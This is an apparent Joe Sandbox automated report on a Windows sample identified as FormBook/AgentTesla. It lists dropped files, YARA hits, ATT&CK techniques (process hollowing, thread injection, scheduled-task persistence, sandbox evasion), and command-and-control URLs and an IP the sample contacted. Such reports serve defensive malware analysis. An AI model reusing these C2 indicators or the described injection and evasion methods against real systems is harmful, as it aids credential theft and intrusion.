          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.299991794.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.362777252.0000000001490000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.362753354.0000000001460000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.469734076.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.304744303.0000000003496000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.469416367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 17.2.Order 275594 04-D4E5A.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.Order 275594 04-D4E5A.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.Order 275594 04-D4E5A.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.Order 275594 04-D4E5A.exe.400000.1.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.299991794.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.362777252.0000000001490000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.362753354.0000000001460000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.469734076.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.304744303.0000000003496000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.469416367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 17.2.Order 275594 04-D4E5A.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.Order 275594 04-D4E5A.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.Order 275594 04-D4E5A.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.Order 275594 04-D4E5A.exe.400000.1.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection612Rootkit1Credential API Hooking1Security Software Discovery331Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsScheduled Task/Job1Masquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion41SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion41NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing22Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 433223 Sample: Order 275594 04-D4E5A.exe Startdate: 11/06/2021 Architecture: WINDOWS Score: 100 42 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 14 other signatures 2->48 10 Order 275594 04-D4E5A.exe 6 2->10         started        process3 file4 32 C:\Users\user\AppData\...DclkRlYpO.exe, PE32 10->32 dropped 34 C:\Users\user\AppData\Local\...\tmp285B.tmp, XML 10->34 dropped 36 C:\Users\...\Order 275594 04-D4E5A.exe.log, ASCII 10->36 dropped 58 Injects a PE file into a foreign processes 10->58 14 Order 275594 04-D4E5A.exe 10->14         started        17 schtasks.exe 1 10->17         started        signatures5 process6 signatures7 60 Modifies the context of a thread in another process (thread injection) 14->60 62 Maps a DLL or memory area into another process 14->62 64 Sample uses process hollowing technique 14->64 66 Queues an APC in another process (thread injection) 14->66 19 explorer.exe 14->19 injected 23 conhost.exe 17->23         started        process8 dnsIp9 38 filmarabia.com 184.168.131.241, 49750, 80 AS-26496-GO-DADDY-COM-LLCUS United States 19->38 40 www.filmarabia.com 19->40 50 System process connects to network (likely due to code injection or exploit) 19->50 25 svchost.exe 19->25         started        signatures10 process11 signatures12 52 Modifies the context of a thread in another process (thread injection) 25->52 54 Maps a DLL or memory area into another process 25->54 56 Tries to detect virtualization through RDTSC time measurements 25->56 28 cmd.exe 1 25->28         started        process13 process14 30 conhost.exe 28->30         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Order 275594 04-D4E5A.exe29%MetadefenderBrowse
          Order 275594 04-D4E5A.exe50%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\EDclkRlYpO.exe29%MetadefenderBrowse
          C:\Users\user\AppData\Roaming\EDclkRlYpO.exe50%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          17.2.Order 275594 04-D4E5A.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          17.0.Order 275594 04-D4E5A.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.Order 275594 04-D4E5A.exe.10000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.filmarabia.com/dlwk/?UR-=9rBHCraXjjKXgv1p&m48=Jq8U7OueiU8HflHyK8f2qmPQo6WO3DR3Chi1RjI9I2gNlG9lXXXNlrydudUfV5dRmlhE0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          www.couragepennies.com/dlwk/0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          https://dan.com/domain-seller/future-parallel?UR-=9rBHCraXjjKXgv1p&m48=Jq8U7OueiU8HflHyK8f2qmPQo6WO30%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          filmarabia.com
          		184.168.131.241
          		truetrue
            		unknown
            www.filmarabia.com
            		unknown
            		unknowntrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.filmarabia.com/dlwk/?UR-=9rBHCraXjjKXgv1p&m48=Jq8U7OueiU8HflHyK8f2qmPQo6WO3DR3Chi1RjI9I2gNlG9lXXXNlrydudUfV5dRmlhEtrue
              • Avira URL Cloud: safe
              		unknown
              www.couragepennies.com/dlwk/true
              • Avira URL Cloud: safe
              		low

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.apache.org/licenses/LICENSE-2.0Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpfalse
                		high
                http://www.fontbureau.comOrder 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.com/designersGOrder 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.com/designers/?Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpfalse
                      		high
                      http://www.founder.com.cn/cn/bTheOrder 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers?Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpfalse
                        		high
                        http://www.tiro.comexplorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designersexplorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpfalse
                          		high
                          http://www.goodfont.co.krOrder 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.carterandcone.comlOrder 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.sajatypeworks.comOrder 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.typography.netDOrder 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers/cabarga.htmlNOrder 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/cTheOrder 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.galapagosdesign.com/staff/dennis.htmOrder 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://fontfabrik.comOrder 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cnOrder 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/frere-jones.htmlOrder 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpfalse
                              		high
                              http://www.jiyu-kobo.co.jp/Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/DPleaseOrder 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers8Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpfalse
                                		high
                                http://www.fonts.comOrder 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.sandoll.co.krOrder 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.urwpp.deDPleaseOrder 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.zhongyicts.com.cnOrder 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameOrder 275594 04-D4E5A.exe, 00000000.00000002.304079572.0000000002483000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.sakkal.comOrder 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://dan.com/domain-seller/future-parallel?UR-=9rBHCraXjjKXgv1p&m48=Jq8U7OueiU8HflHyK8f2qmPQo6WO3svchost.exe, 00000017.00000002.475573917.0000000003B5F000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    184.168.131.241
                                    		filmarabia.comUnited States
                                    		26496AS-26496-GO-DADDY-COM-LLCUStrue

                                    General Information

                                    Joe Sandbox Version:32.0.0 Black Diamond
                                    Analysis ID:433223
                                    Start date:11.06.2021
                                    Start time:13:28:16
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 9m 38s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:Order 275594 04-D4E5A.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:29
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:1
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@10/3@1/1
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 14.1% (good quality ratio 12.8%)
                                    • Quality average: 72.9%
                                    • Quality standard deviation: 31.2%
                                    HCA Information:
                                    • Successful, ratio: 96%
                                    • Number of executed functions: 104
                                    • Number of non-executed functions: 151
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                    • Excluded IPs from analysis (whitelisted): 104.42.151.234, 20.82.210.154, 23.218.208.56, 2.22.118.17, 2.22.118.19, 20.54.7.98, 20.54.26.129, 92.122.213.194, 92.122.213.247, 20.82.209.183
                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/433223/sample/Order 275594 04-D4E5A.exe

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    13:29:40API Interceptor1x Sleep call for process: Order 275594 04-D4E5A.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    184.168.131.2415t2CmTUhKc.exeGet hashmaliciousBrowse
                                    • www.oceancollaborative.com/bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=+tA82deiMnBv5x6tQvXabF4qHjy6FJLdLGXe/FevxPH8etKnEP6uMBOxOd785YA8v1+XbYT2uw==
